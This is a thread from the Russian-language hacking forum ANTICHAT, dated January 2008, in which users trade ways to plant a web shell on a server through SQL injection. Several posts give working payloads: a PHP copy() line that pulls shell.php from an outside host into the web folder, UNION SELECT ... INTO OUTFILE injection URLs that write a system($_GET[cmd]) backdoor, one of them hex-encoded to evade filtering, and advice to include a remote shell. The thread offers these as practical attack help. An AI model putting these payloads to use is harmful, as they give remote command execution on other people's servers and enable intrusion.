ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

08.01.2008, 21:26
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме: 5636868
Репутация:
849
|
|
Сообщение от Spyder
file_priv = 1
Брат-наркоман?
|
|
|

08.01.2008, 21:27
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме: 686641
Репутация:
205
|
|
1) Ой, только не надо поучать Spyder-a
2) ty13r задал вопрос, на который надо отвечать,
а не оффтопить...
|
|
|

08.01.2008, 21:33
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
<? copy("http://sait.narod.ru/shell.php","./shellcheg.php"); ?>
это лучше захексить
запускаешь скрипт шелл копируется из указанного пути (http://sait.narod.ru/shell.php) в папку со скриптом подименем shellcheg.php
__________________
Карфаген должен быть разрушен...
|
|
|

08.01.2008, 21:34
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме: 492591
Репутация:
123
|
|
Нет вы извините конечно за оффтоп, но кто такой Spyder, чтобы ему уже нечему было учиться????
Evil вот и не оффтопь, раз такой умный
Scipio
зачётный способ как-то не догадался)))
Последний раз редактировалось Termin@L; 08.01.2008 в 21:36..
|
|
|

08.01.2008, 21:40
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме: 686641
Репутация:
205
|
|
Посмотри на свою репу, и на репу Spyder-a... А что касается поставленного вопроса: проинклудь шелл и все.
|
|
|

08.01.2008, 21:42
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
если уж на то пошло, то
http://site.com/bug.php?&id=-1'+union+select+'<?system($_GET[cmd]);?>',2+into+outfile+'/www/site/shell.php'/*
то есть не пользуйся пробелами в <?system($_GET[cmd]);?> .. далее, можешь внутри система заинеодить в бэйс. у меня много раз не пропускало именно изза $
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
Последний раз редактировалось blackybr; 08.01.2008 в 21:58..
|
|
|

08.01.2008, 21:43
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
Такс, давай те по порядку, а то я щас с ума сойду
ТС говорит что файл создаётся (!!!), т е права на создание файлов есть, из этого следует вопрос нахуя нужен вот этот пост ------> https://forum.antichat.ru/showpost.php?p=553675&postcount=6 ?????
далее
Spyder
это не всегда удобно так как пост запросы сразу отпадают, а соответственно и заливка файлов на сервер
это кто тебе такую чушь сказал? тебя обманули жестоко
Ты хочешь скать есть выполнить код <?include($_GET[inc])?>
и проинклудить удалённый шелл который работает постом и естественно файлы льются тоже с использованием метода пост, то работат ничего не будет? Ты серьёзно так думаешь?
blackybr: в случае allow_url_fopen будут
Блеки, вообще то
http://site.com/bug.php?&id=-1'+union+select+'<?system($_GET[cmd]);?>',2+into+outfile+'/www/site/shell.php'/*
<?system($_GET[cmd]);?> - надо в кавычки обрамлять
blackybr: Извини ламера  DDDD
хватет мои посты редактировать
blackybr: старею )
Последний раз редактировалось blackybr; 08.01.2008 в 21:59..
|
|
|

08.01.2008, 21:50
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
тогда уж
http://site.com/bug.php?&id=-1'+union+select+0x3C3F73797374656D28245F4745545B22 636D64225D293B3F3E,2+into+outfile+'/www/site/shell.php'/*
а вобще думаю мой вариант наиболее оптимальный (хотя как пхп настроен)
__________________
Карфаген должен быть разрушен...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|